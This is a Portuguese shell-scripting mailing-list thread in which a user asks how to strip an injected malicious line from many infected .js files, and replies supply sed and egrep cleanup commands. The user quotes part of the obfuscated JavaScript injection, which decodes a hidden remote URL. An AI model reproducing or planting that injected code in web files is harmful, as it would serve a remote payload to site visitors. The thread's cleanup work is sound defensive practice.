shell-script-pt
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [shell-script] achar linha com conteúdo e remover a mesma.

From: Lawrence Waclawiak
Subject: Re: [shell-script] achar linha com conteúdo e remover a mesma.
Date: Sat, 17 Apr 2010 10:55:19 -0300
User-agent: Thunderbird 2.0.0.24 (X11/20100317)
Opa, olha só, essa foi meio complicada, to sem tempo pra escrever a explicação de como funciona o que eu fiz, mas a linha completa que vc precisa disparar a partir do diretório onde estão os teus js é:
egrep -RH '.*kDeMtD-McMoDmM.DaMdMvDeD.*' *.js |cut -d":" -f1 |xargs sed -i.backup /^var\ l=\"\"\;try\ \{this\.u=\'\'\;var\ j\;if\(j\!=\'\'\)\{j=\'S\'\}\;var\ Ir=new\ Array\(\)\;var$/d
Esse comando irá fazer a deleção da linha que vc deseja e irá criar um arquivo de backup com a extensão .backup para cada arquivo que for alterado, ou seja 100% seguro 

Abraços


MrBiTs escreveu:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

On 04/13/2010 09:50 PM, Fernando Avena wrote:
> pessoal acontece de varios .js ter sido contaminados e dentro deles foi
> colocado um conteudo malicioso.
>
>
> var l="";try {this.u='';var j;if(j!=''){j='S'};var Ir=new Array();var
> g;if(g!='dF'){g=''};var x;if(x!='R' && x!='si'){x='R'};var z=RegExp;var
> xk;if(xk!='gL'){xk='gL'};var
> h="repS8v".substr(0,3)+"lactT6".substr(0,3)+"e";var Jl="";this.O="";function 
> s(q,Y){var yw=new Date();var m="Ke0[".substr(3);var Xx=new Date();var
> c;if(c!='' && c!='ZH'){c=null};var
> p=String("gI1Th".substr(0,1));m+=Y;m+=String("6Jb]".substr(3));var
> _b='';this.jP='';var XM="";var o=new z(m, p);return q[h](o, new
> String());this.r='';};this.uw="";this.oz='';var
> hu=s('hMtMtMpM:M/M/DpDhDoDtDoDbMuMcMkDeMtD-McMoDmM.DaMdMvDeDrDtDsMeDrDvMeD.McDoDmM.DcDoMnDdDuDiDtM-McMoMmM.MBDeMsMtDBMlDeDnMdDeDrDPMaDrDtM.MrMuM:M',"MD");var 
> i=s('833404383440334',"34");var
> V=s('/wpwi3x3n3e3t3.3n3e3t3/wpwiwxwn3ewt3.3n3ewtw/3g3o3o3gwl3ew.wcwowm3/3s3ows3ow.wc...... 
>
> *find js/ -name *.js | xargs grep -E
> "M/M/DpDhDoDtDoDbMuMcMkDeMtD-McMoDmM.DaMdMvDeDrDtDsMeDrDvMeD.McDoD"*
>
> com linha acima...ele me mostra todos os arquivos e o conteudo da linha
> dentro deles.
>
> teria algo que possa coloca na frete e já faça a remoção desta var l=..... 
> de todos os .js que ele encontrou que tem o conteudo *
> kDeMtD-McMoDmM.DaMdMvDeD* na linha?
sed -e '#M/M/DpDhDoDtDoDbMuMcMkDeMtD-McMoDmM.DaMdMvDeDrDtDsMeDrDvMeD.McDoD#d' arquivo.js
Isso irá remover a linha que contém esse código obfuscado. Entretanto, não irá modificar o arquivo original. As versões mais atuais do sed tem a opção -i, que altera o arquivo imediatamente, mas eu faria antes um backup do arquivo original. O sed também dá essa opção a você. Estude-o, também para entender porquê eu utilizei # como delimitador do sed ao invés do usual / 

- --

Um abraço

.0. MrBiTs - address@hidden <mailto:mrbits.dcf%40gmail.com>
..0 GnuPG - http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x6EC818FC2B3CA5AB <http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x6EC818FC2B3CA5AB> 
000 http://www.mrbits.com.br <http://www.mrbits.com.br>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBCAAGBQJLxayEAAoJEG7IGPwrPKWrecMH/1aYmFnuoBhUor5IGc8x3uWf
q80y+bMO8hqLe1Rx6vug5rMPqZ2o4bwhIAL58eAspaUFGuWj68tXrQnv20etZMU+
SlCLn8PGD3o+5lDu3ConSB5H9QrWqd+Z//7QbfjHcgHiYGGGwEZS56o9QdKozQ5M
8w7+HRy8cHtfKNhiOaKBnurYjY5W036pUYesYQ3yaT6D1HgWOlpE0D0DeH7MHnOy
vDDXgKUiCYnT7TjrIwzg1KjSo9Rl3VV4gJl39a81RZ7j3XUf/BYcKHGQD13z+j+N
Fwvgm0h1/xC5qs7ib+VP0N+w9YJwpOzJHXi169sfGVO1Ag9QdHUcAaz8y+BQ1OM=
=tu90
-----END PGP SIGNATURE-----
reply via email to
[Prev in Thread] Current Thread [Next in Thread]